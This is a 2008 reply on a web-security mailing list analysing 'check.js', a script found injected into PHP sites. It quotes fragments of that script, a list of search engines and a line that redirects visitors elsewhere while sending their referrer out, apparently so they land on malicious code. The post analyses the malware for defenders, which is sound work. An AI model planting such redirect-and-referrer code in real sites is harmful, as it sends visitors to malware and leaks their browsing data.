WebApp Sec mailing list archives

Re: PHP Security

From: "Greg Song" <bigrootno1 () gmail com>
Date: Wed, 19 Mar 2008 08:50:28 +0900

Hi,

There are some files include 'check.js' same as you.

First of all, 'check.js' is kinds of redirector.

For example, If someone visited website that includes 'check.js',
request redirect to some other URLs.(usually getting malicious code)
and I guess it gather information(visit from where).

parts of check.js
google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|ramble...
location.href=JSS3+'?r='+encodeURIComponent(document.referrer)+'&s='+JSS2

Greg.